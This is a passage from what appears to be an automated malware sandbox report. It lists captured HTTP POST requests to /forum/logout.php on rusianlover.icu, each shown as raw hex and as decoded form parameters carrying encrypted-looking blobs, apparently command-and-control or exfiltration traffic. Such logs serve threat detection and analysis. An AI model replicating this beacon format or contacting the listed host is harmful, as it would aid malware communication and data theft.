30 64 37 37 32 34 34 61 36 30 62 34 35 63 32 37 62 62 61 62 65 61 32 62 36 62 33 65 38 61 36 30 64 66 37 33 33 39 65 62 32 66 62 30 37 31 36 32 34 64 65 38 61 33 61 33 34 38 33 64 64 64 34 32 38 30 64 33 33 65 32 31 36 63 33 30 62 39 34 35 61 36 30 32 64 65 65 64 36 65 66 30 62 32 65 36 38 61 31 31 30 38 33 34 30 35 63 64 30 36 30 65 66 62 31 64 64 61 33 30 30 64 38 66 65 36 36 64 62 63 31 35 32 64 34 38 35 63 30 62 30 37 66 64 32 64 34 36 64 63 30 65 33 66 30 36 32 37 39 39 39 39 31 64 33 33 38 30 62 63 32 37 65 32 35 33 65 34 35 31 31 35 31 32 31 64 38 37 32 37 61 31 31 61 30 31 33 66 39 32 66 33 36 65 30 66 35 38 33 65 65 64 64 36 37 33 62 33 61 36 66 32 37 62 36 32 39 31 32 35 34 38 33 35 36 61 32 61 39 30 36 64 38 31 35 66 39 62 33 33 34 62 66 31 65 38 33 31 61 62 37 64 35 30 35 32 62 32 65 35 61 63 36 61 33 37 30 34 39 31 66 64 62 30 38 37 61 35 61 39 38 32 32 30 63 61 63 39 63 64 62 36 63 38 39 65 35 32 32 30 63 32 61 37 33 61 33 30 30 66 34 39 36 31 33 37 39 39 62 33 61 63 62 38 36 34 66 31 35 38 33 65 64 65 65 65 36 32 38 66 61 37 65 64 30 65 66 39 61 32 35 30 32 34 66 Data Ascii: skcu=af9a009d11281eea902293d691&qgwmcsiy=98118406&uoicwq=4be648f06b3d1b670059829fc728df5ceec31c175deac3127f98e9cb0a60e26f6c6c1884395912ad8db26ebd9196023d95b59da8beb855bbb0c702324f7cfefbf66e14e52b447fe64db2cd4064d41e9a1a87900fdbbd8362ab6b3d9e9e026c402770dadbe205c8afae8d6a814cf0d77244a60b45c27bbabea2b6b3e8a60df7339eb2fb071624de8a3a3483ddd4280d33e216c30b945a602deed6ef0b2e68a11083405cd060efb1dda300d8fe66dbc152d485c0b07fd2d46dc0e3f062799991d3380bc27e253e45115121d8727a11a013f92f36e0f583eedd673b3a6f27b62912548356a2a906d815f9b334bf1e831ab7d5052b2e5ac6a370491fdb087a5a98220cac9cdb6c89e5220c2a73a300f49613799b3acb864f1583edeee628fa7ed0ef9a25024f
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=8085154 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 671Cache-Control: no-cacheData Raw: 65 6f 73 63 67 71 3d 39 32 37 39 39 32 35 34 26 67 73 79 6b 71 63 69 75 3d 32 39 41 35 41 46 39 32 33 45 43 33 36 36 33 44 46 39 46 34 46 31 36 36 33 33 39 30 38 31 39 46 31 39 41 43 46 37 32 39 44 46 31 33 32 42 42 31 30 41 44 30 34 42 32 38 26 69 77 65 73 3d 64 35 34 66 33 32 31 62 36 31 61 35 30 30 64 61 32 34 30 31 65 38 30 34 61 36 38 31 36 61 38 36 37 61 62 39 62 37 63 37 65 37 64 36 62 33 65 34 64 66 30 31 30 37 32 64 38 39 64 31 62 39 37 63 65 31 61 62 61 32 64 36 36 33 30 64 33 38 32 62 35 66 30 38 38 64 34 38 33 66 62 64 34 34 34 61 38 65 34 34 30 65 61 64 63 34 38 33 65 32 62 36 61 31 64 36 31 36 34 65 39 34 39 39 64 61 34 61 33 65 33 63 30 39 38 34 64 32 65 64 62 63 66 62 33 35 62 66 35 38 39 30 61 39 33 65 30 32 38 61 39 33 30 62 61 33 36 39 35 30 32 35 32 33 62 37 65 36 35 62 66 65 32 38 63 33 66 35 63 36 30 63 32 63 64 31 31 30 65 66 34 39 34 61 33 37 64 65 39 31 61 33 36 64 64 31 65 63 36 62 66 61 32 63 32 34 35 65 63 64 65 37 63 30 65 38 61 32 61 35 30 30 33 62 36 32 34 36 37 63 35 66 65 63 30 36 32 62 63 62 31 63 37 38 61 65 38 66 64 32 38 34 66 61 66 39 32 39 32 66 30 31 64 62 31 65 65 38 30 64 62 36 61 38 37 35 38 65 65 61 33 64 34 38 34 38 39 63 36 34 39 35 66 62 37 39 31 30 64 66 61 33 39 39 61 63 32 32 61 39 39 63 39 39 37 62 33 35 36 33 38 34 64 63 31 35 39 30 37 34 31 64 35 62 66 38 38 65 62 31 63 31 62 65 65 35 32 32 65 65 62 35 30 36 34 31 39 63 66 38 37 30 35 31 35 33 62 37 65 31 64 64 63 38 36 36 35 36 66 32 35 34 61 36 31 64 64 64 38 35 65 33 38 38 39 61 35 39 37 66 33 63 31 63 34 62 31 35 64 37 33 37 38 39 39 31 39 65 38 62 62 38 37 65 31 37 36 36 35 35 37 39 65 33 61 36 35 35 37 64 61 65 30 61 37 36 37 34 33 34 39 36 64 33 64 63 31 61 61 34 65 30 36 38 62 36 34 39 63 32 64 65 62 30 61 30 37 66 34 62 63 39 36 36 65 36 35 32 32 65 61 32 38 35 30 32 33 36 38 38 34 30 65 35 31 62 34 34 34 33 66 65 32 65 38 35 63 32 65 31 32 37 34 62 64 39 39 36 64 31 64 34 66 38 30 65 61 33 30 65 30 32 30 64 39 65 62 35 32 38 39 33 31 34 30 30 62 62 35 66 39 36 66 31 Data Ascii: eoscgq=92799254&gsykqciu=29A5AF923EC3663DF9F4F1663390819F19ACF729DF132BB10AD04B28&iwes=d54f321b61a500da2401e804a6816a867ab9b7c7e7d6b3e4df01072d89d1b97ce1aba2d6630d382b5f088d483fbd444a8e440eadc483e2b6a1d6164e9499da4a3e3c0984d2edbcfb35bf5890a93e028a930ba369502523b7e65bfe28c3f5c60c2cd110ef494a37de91a36dd1ec6bfa2c245ecde7c0e8a2a5003b62467c5fec062bcb1c78ae8fd284faf9292f01db1ee80db6a8758eea3d48489c6495fb7910dfa399ac22a99c997b356384dc1590741d5bf88eb1c1bee522eeb506419cf8705153b7e1ddc86656f254a61ddd85e3889a597f3c1c4b15d73789919e8bb87e17665579e3a6557dae0a76743496d3dc1aa4e068b649c2deb0a07f4bc966e6522ea28502368840e51b4443fe2e85c2e1274bd996d1d4f80ea30e020d9eb528931400bb5f96f1
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=5263631 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 669Cache-Control: no-cacheData Raw: 6d 79 71 63 3d 30 65 61 31 64 65 61 62 37 63 65 34 62 66 32 39 31 35 31 65 33 63 35 37 64 33 34 61 34 66 65 66 33 30 39 31 34 34 35 38 30 62 30 64 35 64 63 31 38 62 37 34 61 31 26 6b 75 6b 75 6b 75 6b 75 3d 38 30 34 34 34 39 37 34 26 6f 63 77 6b 65 73 3d 42 33 46 38 39 35 35 39 32 41 44 34 30 31 43 31 41 44 38 38 45 45 34 42 45 36 30 46 31 30 30 46 45 43 35 46 36 30 34 30 38 41 31 31 36 44 45 33 45 32 31 44 46 37 36 39 45 34 43 37 41 36 33 43 41 36 44 38 39 44 39 35 30 42 32 33 30 39 37 41 45 44 36 34 38 34 42 34 39 38 43 45 45 46 45 31 36 35 34 37 32 37 39 30 36 42 43 34 37 31 31 32 44 37 46 43 35 46 31 30 45 33 45 37 41 45 45 39 32 34 33 42 33 42 35 43 34 42 41 45 39 39 39 37 34 41 44 43 31 31 36 34 33 32 30 42 43 39 41 35 38 45 31 44 45 37 37 38 39 41 36 36 46 46 32 32 45 32 31 31 31 45 31 39 39 46 42 32 42 33 41 30 30 36 39 32 31 35 43 43 31 43 34 33 43 31 30 46 32 32 46 43 43 37 32 36 43 33 39 30 43 33 44 36 35 41 46 36 46 37 32 46 44 33 42 31 35 37 33 42 39 35 34 39 30 44 30 37 43 37 30 35 44 46 45 38 42 30 38 44 45 46 46 32 44 31 43 39 31 39 45 42 31 44 33 44 34 34 43 46 38 38 31 31 45 31 42 31 39 32 32 33 35 43 41 45 37 38 37 35 44 46 33 42 41 34 35 34 30 35 43 43 46 46 39 33 32 33 38 44 30 38 37 36 36 30 41 37 46 44 34 30 45 38 44 43 36 41 33 31 44 33 39 31 32 43 44 42 46 37 32 38 46 45 30 45 44 43 37 38 37 46 41 34 39 33 46 38 38 31 46 34 39 39 33 41 31 46 31 44 35 34 44 42 36 35 33 36 36 46 43 44 36 32 42 33 38 34 35 32 32 39 36 36 45 34 30 33 37 31 44 43 42 31 44 34 35 35 42 37 33 46 46 34 36 39 36 43 35 36 39 37 45 46 32 39 36 34 44 44 33 42 36 43 36 32 45 30 39 41 36 31 42 37 34 31 33 30 44 43 30 41 35 45 45 44 38 45 41 34 33 33 33 33 38 39 33 37 34 37 32 34 44 44 32 32 34 33 31 36 30 39 42 41 44 39 34 42 30 30 46 44 41 33 33 38 36 36 41 35 45 46 41 35 43 39 45 38 35 33 35 44 34 34 32 31 35 33 42 42 36 31 46 36 34 31 46 36 44 46 32 44 38 31 38 42 44 31 31 41 33 44 43 43 45 31 41 34 34 42 32 39 39 37 35 30 41 45 45 36 39 46 41 36 41 39 31 34 32 30 39 39 32 41 Data Ascii: myqc=0ea1deab7ce4bf29151e3c57d34a4fef309144580b0d5dc18b74a1&kukukuku=80444974&ocwkes=B3F895592AD401C1AD88EE4BE60F100FEC5F60408A116DE3E21DF769E4C7A63CA6D89D950B23097AED6484B498CEEFE1654727906BC47112D7FC5F10E3E7AEE9243B3B5C4BAE99974ADC1164320BC9A58E1DE7789A66FF22E2111E199FB2B3A0069215CC1C43C10F22FCC726C390C3D65AF6F72FD3B1573B95490D07C705DFE8B08DEFF2D1C919EB1D3D44CF8811E1B192235CAE7875DF3BA45405CCFF93238D087660A7FD40E8DC6A31D3912CDBF728FE0EDC787FA493F881F4993A1F1D54DB65366FCD62B384522966E40371DCB1D455B73FF4696C5697EF2964DD3B6C62E09A61B74130DC0A5EED8EA4333389374724DD22431609BAD94B00FDA33866A5EFA5C9E8535D442153BB61F641F6DF2D818BD11A3DCCE1A44B299750AEE69FA6A91420992A
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?pid=438 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 665Cache-Control: no-cacheData Raw: 6b 75 65 6f 79 69 73 63 3d 45 38 31 41 32 38 46 39 43 45 31 38 46 34 31 32 37 42 39 43 39 41 45 34 39 42 36 44 32 37 35 45 33 35 35 36 41 39 32 45 35 41 38 35 43 42 41 42 43 33 26 69 71 79 67 6f 77 3d 37 36 37 38 32 32 34 32 26 6d 79 6b 77 3d 32 34 35 44 30 46 45 38 31 36 34 35 46 44 46 44 39 44 46 44 30 33 46 33 34 44 43 44 41 37 41 43 38 46 46 30 33 30 33 37 46 37 32 41 37 45 31 33 41 41 35 35 35 37 45 35 33 31 35 30 33 30 34 46 45 32 30 42 43 34 37 31 31 31 43 32 30 33 37 36 30 37 41 44 32 38 37 46 33 41 33 41 39 39 42 44 43 33 39 33 30 37 45 46 31 46 46 34 39 38 44 39 34 34 33 36 43 38 37 44 35 34 34 42 46 46 33 45 38 36 39 35 45 44 36 38 32 44 45 43 38 37 45 31 45 31 46 35 38 44 41 33 41 41 35 34 33 45 43 37 37 42 36 31 31 32 33 46 34 32 30 46 37 39 39 37 34 35 41 38 46 35 31 35 30 30 43 31 39 42 38 42 44 44 33 32 39 33 32 43 45 36 45 32 43 31 30 41 45 34 37 33 37 39 38 45 41 35 35 32 46 44 41 42 44 33 38 39 43 44 37 34 34 32 37 30 34 42 41 45 37 42 42 31 45 34 46 42 33 32 41 37 32 43 43 30 46 46 37 39 34 30 38 39 45 44 39 42 33 31 30 39 44 30 41 42 36 32 33 45 34 36 44 34 32 38 44 38 36 45 32 30 31 32 44 32 43 38 45 34 37 34 35 30 30 30 44 43 34 43 42 31 39 39 36 39 30 32 41 34 34 37 36 41 35 31 31 31 34 43 39 36 34 36 43 36 38 30 38 46 46 35 45 31 42 31 43 44 33 42 38 42 41 41 37 41 31 42 44 33 32 43 31 45 31 42 39 43 36 36 39 32 44 31 32 38 33 39 45 34 33 39 45 41 45 38 33 33 46 30 45 35 36 45 46 31 39 42 33 38 46 34 46 45 46 34 38 35 32 38 43 30 41 31 37 33 41 30 35 44 42 35 41 32 45 32 39 34 38 44 36 36 33 35 34 33 31 30 38 46 31 31 39 41 36 34 41 39 41 32 32 43 34 37 36 44 42 44 45 46 46 43 30 39 36 32 39 46 45 43 41 33 46 39 44 43 45 38 34 34 41 44 32 46 33 44 33 46 38 37 45 35 35 37 35 43 38 43 42 33 33 35 45 43 43 31 34 30 38 32 39 46 31 35 35 31 41 44 46 44 42 37 42 31 35 31 41 42 39 44 30 34 32 36 34 30 39 33 30 46 38 35 35 44 35 37 30 35 44 37 31 30 36 44 39 44 32 31 30 33 44 41 38 42 33 32 45 31 37 39 31 39 32 36 41 39 30 42 34 44 39 34 37 33 Data Ascii: kueoyisc=E81A28F9CE18F4127B9C9AE49B6D275E3556A92E5A85CBABC3&iqygow=76782242&mykw=245D0FE81645FDFD9DFD03F34DCDA7AC8FF03037F72A7E13AA5557E53150304FE20BC47111C2037607AD287F3A3A99BDC39307EF1FF498D94436C87D544BFF3E8695ED682DEC87E1E1F58DA3AA543EC77B61123F420F799745A8F51500C19B8BDD32932CE6E2C10AE473798EA552FDABD389CD7442704BAE7BB1E4FB32A72CC0FF794089ED9B3109D0AB623E46D428D86E2012D2C8E4745000DC4CB1996902A4476A51114C9646C6808FF5E1B1CD3B8BAA7A1BD32C1E1B9C6692D12839E439EAE833F0E56EF19B38F4FEF48528C0A173A05DB5A2E2948D663543108F119A64A9A22C476DBDEFFC09629FECA3F9DCE844AD2F3D3F87E5575C8CB335ECC140829F1551ADFDB7B151AB9D042640930F855D5705D7106D9D2103DA8B32E1791926A90B4D9473
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 667Cache-Control: no-cacheData Raw: 75 75 6f 6f 69 69 3d 35 38 44 34 43 39 33 36 39 34 32 38 37 46 34 30 46 32 46 30 46 37 44 46 35 39 41 43 30 41 33 41 41 41 41 46 36 45 38 41 35 33 44 45 37 32 34 41 41 31 42 37 26 73 71 69 67 3d 32 30 38 32 33 35 32 38 26 77 79 75 77 73 75 77 73 3d 36 61 61 37 37 33 64 37 39 62 38 66 61 31 64 34 62 38 64 66 31 35 63 34 63 31 38 63 32 66 30 38 63 36 31 65 36 38 32 39 66 37 33 35 62 63 65 63 34 39 38 34 32 63 36 36 35 66 37 35 36 65 64 31 32 64 32 31 38 35 65 61 65 31 64 32 36 62 66 34 34 62 39 32 61 32 32 38 63 33 37 34 31 65 66 39 36 32 31 66 37 65 63 66 65 61 34 31 64 35 35 32 39 32 32 31 63 37 37 32 37 34 61 61 30 31 34 39 38 36 65 39 39 30 61 36 36 30 39 32 61 32 36 34 31 61 65 65 62 65 39 38 31 39 37 34 39 35 38 31 38 32 30 33 36 33 66 30 66 39 38 37 66 36 62 61 64 38 66 39 37 36 38 39 39 61 36 38 62 35 63 30 34 34 31 39 31 61 36 36 31 35 63 34 62 36 35 39 63 37 33 61 36 39 66 33 35 34 38 36 38 30 30 35 62 37 36 31 38 39 31 39 38 66 64 61 34 33 32 34 36 63 62 63 63 65 39 39 39 37 62 34 38 32 66 64 35 37 37 30 34 31 31 66 38 64 62 33 61 34 33 63 61 66 38 37 66 32 63 30 63 32 31 64 33 66 61 66 66 38 65 65 32 31 62 62 65 33 62 38 39 34 32 36 64 37 31 61 64 30 62 31 35 63 32 61 39 37 31 33 37 39 35 63 38 37 31 34 65 39 34 63 33 36 32 39 38 64 66 36 66 66 33 64 34 35 64 32 34 32 35 35 38 31 39 34 35 61 30 38 33 66 37 62 38 36 34 37 39 65 65 30 33 31 38 61 35 66 30 63 38 30 39 61 30 36 62 38 31 63 66 37 65 32 63 66 37 62 61 38 39 39 64 64 65 63 31 35 34 61 38 37 33 62 66 62 64 62 63 39 64 37 66 63 36 36 63 31 34 32 36 63 64 33 39 33 31 36 62 34 39 38 39 37 33 64 32 34 37 33 32 35 63 31 33 36 65 39 31 36 39 38 31 63 39 31 63 39 30 33 65 37 61 39 62 64 30 36 31 32 62 33 36 30 36 35 36 32 31 65 65 33 36 31 39 39 65 33 34 39 65 61 61 34 35 31 65 37 63 39 66 39 65 34 62 62 39 35 38 62 30 39 36 30 61 36 61 61 35 32 39 32 36 30 63 32 31 64 65 64 66 32 66 61 61 35 31 39 38 39 64 35 30 65 38 65 37 35 66 33 38 36 63 36 62 30 39 65 30 65 38 31 36 32 38 61 37 32 33 33 64 64 30 65 Data Ascii: uuooii=58D4C93694287F40F2F0F7DF59AC0A3AAAAF6E8A53DE724AA1B7&sqig=20823528&wyuwsuws=6aa773d79b8fa1d4b8df15c4c18c2f08c61e6829f735bcec49842c665f756ed12d2185eae1d26bf44b92a228c3741ef9621f7ecfea41d5529221c77274aa014986e990a66092a2641aeebe9819749581820363f0f987f6bad8f976899a68b5c044191a6615c4b659c73a69f354868005b76189198fda43246cbcce9997b482fd5770411f8db3a43caf87f2c0c21d3faff8ee21bbe3b89426d71ad0b15c2a9713795c8714e94c36298df6ff3d45d2425581945a083f7b86479ee0318a5f0c809a06b81cf7e2cf7ba899ddec154a873bfbdbc9d7fc66c1426cd39316b498973d247325c136e916981c91c903e7a9bd0612b36065621ee36199e349eaa451e7c9f9e4bb958b0960a6aa529260c21dedf2faa51989d50e8e75f386c6b09e0e81628a7233dd0e
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?pid=925 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 663Cache-Control: no-cacheData Raw: 61 67 6d 6d 73 79 79 65 3d 41 31 43 32 45 35 46 34 39 33 38 32 42 32 45 33 36 32 35 37 35 32 39 41 30 34 36 39 39 43 36 36 33 35 45 33 42 41 46 41 44 41 41 32 33 45 38 41 26 79 63 67 65 69 6d 3d 38 38 35 33 34 31 30 36 26 63 6b 73 75 3d 63 35 38 62 66 38 31 66 61 36 33 36 38 35 66 37 62 61 38 38 64 34 34 35 33 34 31 34 65 62 30 35 34 31 36 39 65 66 61 66 65 36 63 30 62 31 37 32 65 61 62 63 35 33 65 37 39 65 64 62 63 62 34 31 61 38 64 30 34 30 30 62 32 62 31 38 32 38 39 34 32 63 61 31 34 32 64 66 61 38 65 34 36 61 62 30 63 30 32 37 30 63 38 63 63 34 36 62 66 30 31 33 63 63 35 39 36 39 37 64 62 32 30 62 39 65 64 35 31 30 33 33 35 33 38 61 36 38 66 37 66 34 31 38 62 34 38 31 33 32 36 35 64 33 30 32 63 33 32 34 33 33 63 31 63 35 62 33 35 66 36 39 39 34 36 33 39 36 38 38 66 62 37 36 66 64 34 63 31 38 63 39 38 36 63 61 31 37 61 32 30 38 39 32 34 31 34 66 35 37 37 31 63 61 64 62 38 37 63 37 34 39 35 64 37 65 36 32 65 34 62 32 34 64 63 65 37 33 34 64 62 61 33 33 30 30 36 62 65 34 61 64 30 39 30 64 32 38 35 35 38 62 63 63 32 65 35 31 32 38 31 32 35 32 35 64 63 66 34 38 33 31 37 39 32 61 33 62 62 32 63 62 33 39 35 34 62 35 35 37 38 64 32 61 35 38 30 66 31 65 39 63 62 39 33 38 38 64 31 33 39 32 38 33 63 33 33 33 66 39 36 30 62 33 39 37 31 65 64 35 39 33 30 38 61 66 64 61 62 34 30 39 32 30 31 61 34 62 30 39 34 38 33 64 31 64 31 31 30 38 65 61 30 33 36 35 34 65 62 65 30 35 39 65 37 32 62 32 37 30 38 33 30 39 61 62 32 32 38 35 64 33 38 39 39 38 64 66 36 63 31 38 66 37 39 32 36 35 34 31 65 39 64 61 61 66 65 30 33 31 34 35 30 30 66 64 62 32 36 65 62 36 32 34 62 65 30 31 30 32 65 32 64 61 38 66 37 37 62 31 33 39 37 30 32 36 30 36 36 32 64 61 62 36 37 30 63 34 35 31 33 39 62 36 31 65 34 30 65 39 66 64 34 30 30 36 62 38 38 34 39 39 39 61 63 64 39 36 66 35 66 38 61 31 65 63 39 65 65 38 33 33 33 65 37 62 35 31 66 32 33 61 30 63 65 32 31 35 38 35 63 32 65 66 62 37 37 64 65 66 34 38 65 30 31 33 64 61 65 37 35 33 37 37 63 32 33 62 62 63 38 37 31 35 32 64 66 38 64 30 35 38 30 38 Data Ascii: agmmsyye=A1C2E5F49382B2E36257529A04699C6635E3BAFADAA23E8A&ycgeim=88534106&cksu=c58bf81fa63685f7ba88d4453414eb054169efafe6c0b172eabc53e79edbcb41a8d0400b2b1828942ca142dfa8e46ab0c0270c8cc46bf013cc59697db20b9ed51033538a68f7f418b4813265d302c32433c1c5b35f6994639688fb76fd4c18c986ca17a20892414f5771cadb87c7495d7e62e4b24dce734dba33006be4ad090d28558bcc2e512812525dcf4831792a3bb2cb3954b5578d2a580f1e9cb9388d139283c333f960b3971ed59308afdab409201a4b09483d1d1108ea03654ebe059e72b2708309ab2285d38998df6c18f7926541e9daafe0314500fdb26eb624be0102e2da8f77b13970260662dab670c45139b61e40e9fd4006b884999acd96f5f8a1ec9ee8333e7b51f23a0ce21585c2efb77def48e013dae75377c23bbc87152df8d05808
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 648Cache-Control: no-cacheData Raw: 74 73 72 6b 6a 69 68 61 7a 3d 31 36 35 34 36 33 36 31 26 76 77 78 73 74 3d 45 31 34 35 35 41 32 33 39 37 37 42 37 38 35 41 31 35 41 35 36 44 37 44 35 35 41 34 33 46 26 78 61 64 61 64 67 6a 3d 41 30 42 45 35 34 36 46 31 33 46 43 45 46 46 37 39 38 38 30 38 46 44 37 37 43 35 33 45 34 37 37 30 30 46 42 32 30 43 36 32 34 39 37 35 31 32 31 32 33 34 33 39 33 32 34 39 31 39 39 30 43 41 43 31 44 33 36 42 45 36 39 37 38 35 42 32 36 44 33 41 34 36 41 43 41 31 30 44 36 31 42 37 35 32 44 41 34 45 33 38 37 34 43 46 34 39 33 35 45 32 39 41 31 37 33 30 42 41 31 33 39 37 33 38 41 33 33 43 31 38 30 41 36 34 37 45 39 31 42 33 39 37 38 30 38 39 41 41 44 46 43 42 38 35 35 42 39 41 36 46 37 37 39 35 42 30 37 39 45 36 45 33 38 37 38 38 36 37 43 31 45 30 33 44 30 32 45 30 39 39 35 44 38 44 36 36 35 33 33 36 45 33 41 43 38 36 35 35 43 36 36 44 46 38 43 45 42 41 34 45 33 41 36 35 39 30 44 43 34 42 43 34 36 39 43 36 31 45 37 30 42 42 36 44 42 42 33 43 31 30 41 34 31 46 44 39 31 46 45 34 31 37 45 46 39 41 41 35 46 39 33 30 31 33 39 34 44 32 45 39 46 44 34 43 41 45 34 32 32 39 32 30 32 39 44 38 41 33 45 31 33 33 32 45 36 37 39 46 38 43 45 38 45 36 39 35 30 46 31 31 41 30 33 37 31 38 42 38 37 44 33 38 46 45 41 42 46 46 34 35 43 39 44 37 30 36 30 32 31 33 33 39 44 41 31 44 41 34 34 44 33 31 34 42 43 39 46 41 33 44 35 41 46 39 33 39 42 37 41 30 30 30 42 34 39 39 31 38 34 43 35 33 30 31 31 37 46 31 31 45 33 43 35 44 33 41 46 38 38 37 35 35 31 41 42 41 45 46 33 42 33 39 31 46 32 41 34 36 34 36 42 42 46 32 35 46 30 30 42 31 36 42 32 44 36 35 34 34 45 31 30 33 33 31 30 32 41 35 46 38 45 38 42 45 35 38 35 41 44 39 30 34 30 43 41 33 46 46 33 37 41 41 39 41 33 32 34 38 31 41 34 30 41 36 46 34 34 45 34 39 46 31 33 39 37 46 39 43 32 45 39 33 30 34 30 45 33 45 33 34 30 39 41 38 42 41 44 46 39 38 32 46 34 45 41 41 36 30 32 35 41 46 39 46 36 34 36 38 38 45 34 38 35 44 42 45 37 37 43 42 46 46 44 30 31 35 43 43 34 35 32 33 35 44 43 44 35 38 33 30 38 34 34 Data Ascii: tsrkjihaz=16546361&vwxst=E1455A23977B785A15A56D7D55A43F&xadadgj=A0BE546F13FCEFF798808FD77C53E47700FB20C6249751212343932491990CAC1D36BE69785B26D3A46ACA10D61B752DA4E3874CF4935E29A1730BA139738A33C180A647E91B3978089AADFCB855B9A6F7795B079E6E3878867C1E03D02E0995D8D665336E3AC8655C66DF8CEBA4E3A6590DC4BC469C61E70BB6DBB3C10A41FD91FE417EF9AA5F9301394D2E9FD4CAE42292029D8A3E1332E679F8CE8E6950F11A03718B87D38FEABFF45C9D706021339DA1DA44D314BC9FA3D5AF939B7A000B499184C530117F11E3C5D3AF887551ABAEF3B391F2A4646BBF25F00B16B2D6544E1033102A5F8E8BE585AD9040CA3FF37AA9A32481A40A6F44E49F1397F9C2E93040E3E3409A8BADF982F4EAA6025AF9F64688E485DBE77CBFFD015CC45235DCD5830844
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 644Cache-Control: no-cacheData Raw: 7a 79 64 63 68 67 66 3d 36 65 64 38 64 39 33 32 37 37 36 30 35 30 32 61 31 31 61 31 33 31 35 61 32 63 26 78 75 78 75 78 3d 34 30 36 35 38 35 34 35 26 62 63 6a 6b 72 73 74 61 62 3d 33 46 36 37 44 37 43 43 38 35 36 36 39 35 42 39 41 32 42 44 31 32 30 44 34 44 31 37 46 38 39 32 30 42 36 30 36 43 34 38 43 32 34 34 46 33 30 36 34 43 31 35 35 38 39 36 39 31 41 42 36 34 31 38 45 37 32 32 41 35 30 33 41 37 34 45 35 30 43 35 44 34 30 43 44 36 34 36 46 33 32 32 36 32 35 34 38 37 32 46 36 33 35 34 32 30 37 41 31 30 42 42 35 46 33 33 44 33 39 45 44 36 42 46 35 43 41 45 33 39 42 32 39 31 35 41 34 37 34 36 38 33 42 36 44 38 42 39 32 35 30 35 39 30 33 30 37 37 42 43 42 31 39 38 44 45 32 46 39 44 41 38 45 32 43 44 42 35 39 31 44 30 33 38 31 44 30 38 36 38 33 41 44 33 41 42 33 46 46 30 30 39 37 31 33 46 35 46 31 36 44 42 44 45 44 37 33 39 46 39 43 30 30 38 30 31 45 39 30 44 34 42 34 33 42 39 43 41 45 42 45 44 43 32 42 31 41 35 33 42 31 34 34 46 42 44 43 43 37 31 33 46 32 30 38 37 34 41 33 46 35 36 42 33 30 43 37 35 34 30 39 39 44 39 36 39 32 46 45 39 35 44 32 37 37 31 30 41 39 35 38 42 41 42 42 37 36 34 44 32 39 45 37 43 46 43 44 32 39 37 35 33 32 33 36 44 31 42 35 30 45 34 44 31 42 34 38 33 45 35 46 30 45 36 36 37 35 37 34 32 30 32 44 31 32 34 38 46 32 35 46 43 34 30 38 39 33 37 33 41 32 37 35 30 30 32 41 32 44 35 42 37 44 32 36 31 38 45 43 43 45 34 44 36 35 41 46 31 38 42 30 41 44 31 39 43 32 35 46 39 45 33 30 31 32 43 46 46 42 30 30 44 31 38 34 38 30 36 46 41 41 34 34 41 30 32 37 44 46 45 44 44 32 38 31 33 35 31 46 35 41 31 38 43 33 37 38 39 39 35 32 34 36 31 35 43 31 36 37 43 32 43 44 31 43 33 33 33 43 38 39 31 39 46 30 35 30 43 36 44 45 38 44 34 41 46 34 30 35 41 33 41 45 35 45 42 41 44 31 39 31 35 43 44 35 45 45 44 30 42 35 41 46 46 44 36 41 34 33 36 38 37 36 32 35 30 38 46 33 31 45 34 46 43 30 43 46 36 42 38 41 30 38 32 38 33 34 36 44 44 39 46 34 33 34 43 30 36 41 33 39 32 33 37 44 35 43 35 45 31 46 45 31 34 Data Ascii: zydchgf=6ed8d9327760502a11a1315a2c&xuxux=40658545&bcjkrstab=3F67D7CC856695B9A2BD120D4D17F8920B606C48C244F3064C15589691AB6418E722A503A74E50C5D40CD646F3226254872F6354207A10BB5F33D39ED6BF5CAE39B2915A474683B6D8B92505903077BCB198DE2F9DA8E2CDB591D0381D08683AD3AB3FF009713F5F16DBDED739F9C00801E90D4B43B9CAEBEDC2B1A53B144FBDCC713F20874A3F56B30C754099D9692FE95D27710A958BABB764D29E7CFCD29753236D1B50E4D1B483E5F0E667574202D1248F25FC4089373A275002A2D5B7D2618ECCE4D65AF18B0AD19C25F9E3012CFFB00D184806FAA44A027DFEDD281351F5A18C37899524615C167C2CD1C333C8919F050C6DE8D4AF405A3AE5EBAD1915CD5EED0B5AFFD6A4368762508F31E4FC0CF6B8A0828346DD9F434C06A39237D5C5E1FE14
